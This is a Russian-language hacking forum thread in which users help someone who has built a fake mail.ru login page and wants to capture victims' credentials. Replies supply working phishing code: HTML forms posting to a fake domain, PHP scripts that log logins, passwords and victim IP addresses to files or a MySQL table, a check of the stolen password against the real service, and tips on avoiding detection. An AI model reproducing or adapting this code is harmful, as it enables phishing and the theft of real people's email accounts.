У меня вопрос!!! Я сделал фейк mail.ru как мне сделать письмо как на фото чтоб когда жертва вводит свои данные и нажимает подтвердить они записовались в базу БД? Кто так сможет сделать отзовитесь!
Зачем тебе заморочки с БД. Пиши в файл. Например так. PHP: Содержимое нтмл письма (форма отправки данных) ... <form action="http://фейк_мейл.ру/auth.php" method="POST"> <input type="text" name="login" >Логин<br> <input type="password" name="pass">Пароль <input type="submit"> </form> .... и собственно скрипт записи логина и пасса PHP: <?php $login=$_POST['login']; $pass=$_POST['pass']; $data=$login." ".$pass; $fh=fopen("data.txt", "a"); fwrite($fh, $data); fclose($fh); ?>
на mail.ru POST не работает поэтому: PHP: <form action="http://фейк_мейл.ру/auth.php" method="GET"> <input type="text" name="login" >Логин<br> <input type="password" name="pass">Пароль <input type="submit"> PHP: <?php $login=$_GET['login']; $pass=$_GET['pass']; $data=$login.";".$pass."\n"; $fh=fopen("data.txt", "a"); fwrite($fh, $data); fclose($fh); Header("Location: http://win.mail.ru/cgi-bin/auth"); exit(); ?>
С гетом палево будет Увидев в адресной строке адрес вида http://фейк_мейл.ру/auth.php?login=lamer&pass=123456 даже имбицил поймет, что его поимели. Кстати редирект на http://mail.ru/cgi-bin/ - Forbidden Насчет поста ниже : Так я и не спорил Я просто предложил заменить редирект на http://win.mail.ru/cgi-bin/auth
Имееться ввиду, что бы в письме прислать форму? Наверно спалят тогда... Интересно, надо будет проверить позволяет ли мейл.ру отсылать данные гетом(из письма непосредственно)
тоже интересно, присылали недавно такое письмо. я его разобрал хорошенько. код, адрес фэйка, ип того кто слыл узнал=) а повторить не получается. "расширенный формат" криво код преобразует(((
вот самый нормальный вариант фейка. PHP: <?php error_reporting(0); $cont = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']); if(strstr($cont, '<b>Ошибка</b>')) die(str_replace('action="auth"', '', $cont)); $fo = fopen('mail.lg', 'a'); fwrite($fo, date('d.m.y H:i:s')."\t".$_SERVER['REMOTE_ADDR']."\n"); fwrite($fo, $_POST['Login'].'@'.$_POST['Domain']."\t".$_POST['Password']."\n\n"); fclose($fo); header('Location: http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']); ?>
Добавление записей в БД: Таблица: Code: CREATE TABLE `mails` ( `id` int(20) NOT NULL auto_increment, `mail` varchar(100) NOT NULL, `pass` varchar(100) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=cp1251 AUTO_INCREMENT=30 ; Форма: PHP: <form action="<?=$_SERVER['PHP_SELF']?>" method="post"> <input name="login" type="text" /> <input name="pass" type="password" /> <input type="submit" value="Войти" /> </form> Скрипт: PHP: <?php $login = !empty($_POST['login']) && preg_match('/^[a-zA-Z0-9-_\.]+@[a-zA-Z0-9]+\.[a-zA-Z]{2,5}$/', $_POST['login']) ? trim($_POST['login']) : ''; $pass = !empty($_POST['pass']) ? trim($_POST['pass']) : ''; if($login && $pass){ $login = get_magic_quotes_gpc() ? $login : mysql_real_escape_string($login); $pass = get_magic_quotes_gpc() ? $pass : mysql_real_escape_string($pass); mysql_connect('localhost', 'user', 'pass'); mysql_select_db('mails'); $sql = mysql_query("INSERT INTO `mails` VALUE(null, '".$login."', '".$pass."')"); if($sql){ header('location: http://mail.ru'); } } ?> Тема закрыта во избежании оффтопа, т.к. со взломами в другой раздел.
